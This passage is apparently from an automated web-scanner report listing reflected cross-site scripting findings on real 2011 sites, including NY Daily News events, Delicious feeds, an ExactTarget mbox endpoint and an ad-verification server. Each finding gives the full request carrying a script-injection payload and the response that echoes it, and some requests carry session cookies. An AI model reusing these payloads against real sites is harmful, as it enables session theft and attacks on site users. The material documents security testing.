Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __utma=263866259.953009987.1312767390.1312767390.1312835786.2; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 50.23.123.106
X-Runtime: 17
ETag: "345570b36170ce09afb9bd1922c9dc79"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www20
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECILcmFkaXVzaRkiCWNpdHkiDU5ldyBZb3JrIgplcnJvckYiDWxhdGl0dWRlZho0MC43NTYxMDAwMDAwMDAwMDQAQLgiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--4af12862644ffd881c2159b4b7c99cd5594844a4; path=/; expires=Fri, 11-Nov-2011 22:35:27 GMT; HttpOnly
Content-Length: 264

Zvents_load_ZventsWidget1('callback({"rsp":{"status":"error","msg":"Invalid search: event67f365a44214f354 is not a valid search category.","content":{"next_page":false,"identifier": "st=event67f36<script>alert(1)</script>5a44214f354&when=today&ssi=0&srss=4"}}})')

1.225. http://events.nydailynews.com/partner_json/search [image_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the image_size request parameter is copied into the HTML document as plain text between tags. The payload a2960<script>alert(1)</script>23d031d555e was submitted in the image_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumba2960<script>alert(1)</script>23d031d555e&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:35 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 455
ETag: "2db2f2300aa255ecfb1ee8c22ab5041a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: b145210b425eb01eee94d1c7b06bfb5dc9c830e7
Z-REQUEST-HANDLED-BY: www28
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2131

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumba2960<script>alert(1)</script>23d031d555e.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"Pacha Teen Night with Dj
...[SNIP]...

1.226. http://events.nydailynews.com/partner_json/search [jsonsp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 8b9c9<script>alert(1)</script>deca5adb594 was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_08b9c9<script>alert(1)</script>deca5adb594 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:11 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 92
ETag: "ef147786317863042bcdeb82556459d0"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: be1188d01917925547700abedbea482ea7c8b840
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 1958

jsp_08b9c9<script>alert(1)</script>deca5adb594('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":2181
...[SNIP]...

1.227. http://events.nydailynews.com/partner_json/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 6019a<script>alert(1)</script>64a6f8607b8 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event6019a<script>alert(1)</script>64a6f8607b8&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:36:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 11
ETag: "e4fa1ff862b60744626a3b07ce01b240"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: da1f8520773bf64cff87fdc83099acf06489f7b0
Z-REQUEST-HANDLED-BY: www21
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 131

{"rsp":{"status":"failed","msg":"Invalid search: event6019a<script>alert(1)</script>64a6f8607b8 is not a valid search category."}}

1.228. http://events.nydailynews.com/partner_json/search [when parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.nydailynews.com
Path:   /partner_json/search

Issue detail

The value of the when request parameter is copied into the HTML document as plain text between tags. The payload d5cfb<script>alert(1)</script>2dd8a5df4aa was submitted in the when parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64&radius=75&where=New+York%2C+NY&tag=&when=next+30+daysd5cfb<script>alert(1)</script>2dd8a5df4aa&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 19
ETag: "e3834b5cda8e7aef83a32aa6f27b09ac"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 19ae35a7fb298d27c4555c7da507d4f846376446
Z-REQUEST-HANDLED-BY: www30
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 476

{"rsp":{"status":"failed","msg":"Unrecognized date format: next 30 daysd5cfb<script>alert(1)</script>2dd8a5df4aa is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

1.229. http://exacttarget.tt.omtrdc.net/m2/exacttarget/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exacttarget.tt.omtrdc.net
Path:   /m2/exacttarget/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 10742<script>alert(1)</script>b543d8110c0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/exacttarget/mbox/standard?mboxHost=www.exacttarget.com&mboxSession=1314893721327-888860&mboxPage=1314893721327-888860&screenHeight=1200&screenWidth=1920&browserWidth=1033&browserHeight=852&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=et_beta10742<script>alert(1)</script>b543d8110c0&mboxId=0&mboxTime=1314875721479&mboxURL=http%3A%2F%2Fwww.exacttarget.com%2F&mboxReferrer=http%3A%2F%2Fwww.iab.net%2Fsite_map&mboxVersion=40 HTTP/1.1
Host: exacttarget.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.exacttarget.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 203
Date: Thu, 01 Sep 2011 16:15:53 GMT
Server: Test & Target

mboxFactories.get('default').get('et_beta10742<script>alert(1)</script>b543d8110c0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1314893721327-888860.19");

1.230. http://feeds.delicious.com/v2/js/awsbuzz [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 63266<script>alert(1)</script>229a106f66a was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=1063266<script>alert(1)</script>229a106f66a&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:38 GMT
Server: nginx/1.0.6
Content-Length: 751
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_92228 = function(posts) {
Delicious.Linkrolls.writeln({"count": "1063266<script>alert(1)</script>229a106f66a", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon
...[SNIP]...

1.231. http://feeds.delicious.com/v2/js/awsbuzz [icon parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the icon request parameter is copied into the HTML document as plain text between tags. The payload 4bba2<script>alert(1)</script>aeadd697d46 was submitted in the icon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss4bba2<script>alert(1)</script>aeadd697d46&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:36 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_72296 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss4bba2<script>alert(1)</script>aeadd697d46"}, posts);
};
document.writeln('<scr'+'ipt type="text/javascript" src="http://www.delicious.com/static/js/del-linkrolls.js">
...[SNIP]...

1.232. http://feeds.delicious.com/v2/js/awsbuzz [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1d17a<script>alert(1)</script>2d39d680b48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date&1d17a<script>alert(1)</script>2d39d680b48=1 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:43 GMT
Server: nginx/1.0.5
Content-Length: 719
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_50879 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "1d17a<script>alert(1)</script>2d39d680b48": "1", "version": 2, "user": "awsbuzz", "STATIC_URL": "http://www.delicious.com/static/", "icon": "rss"}, posts);
};
document.writeln('<scr'+'ipt type="text/javascript" src="http://www.delicious.com/s
...[SNIP]...

1.233. http://feeds.delicious.com/v2/js/awsbuzz [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the sort request parameter is copied into the HTML document as plain text between tags. The payload 7b7b2<script>alert(1)</script>b72a370e221 was submitted in the sort parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious&icon=rss&count=10&sort=date7b7b2<script>alert(1)</script>b72a370e221 HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:41 GMT
Server: nginx/1.0.6
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_10002 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date7b7b2<script>alert(1)</script>b72a370e221", "title": "AWS Buzz on Delicious", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss"}, posts
...[SNIP]...

1.234. http://feeds.delicious.com/v2/js/awsbuzz [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.delicious.com
Path:   /v2/js/awsbuzz

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 1299a<script>alert(1)</script>640aa9f4867 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/js/awsbuzz?title=AWS%20Buzz%20on%20Delicious1299a<script>alert(1)</script>640aa9f4867&icon=rss&count=10&sort=date HTTP/1.1
Host: feeds.delicious.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://aws.typepad.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sun, 02 Oct 2011 01:31:34 GMT
Server: nginx/1.0.5
Content-Length: 710
Connection: keep-alive

if (typeof window.Delicious == 'undefined') window.Delicious = {};
Delicious.Linkrolls_CB_60640 = function(posts) {
Delicious.Linkrolls.writeln({"count": "10", "sort": "date", "title": "AWS Buzz on Delicious1299a<script>alert(1)</script>640aa9f4867", "usertags": false, "BASE_URL": "http://www.delicious.com/", "STATIC_URL": "http://www.delicious.com/static/", "version": 2, "user": "awsbuzz", "icon": "rss"}, posts);
};
document.writeln('<scr'+'ipt
...[SNIP]...

1.235. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e72ac"-alert(1)-"9131707641a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dce72ac"-alert(1)-"9131707641a/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
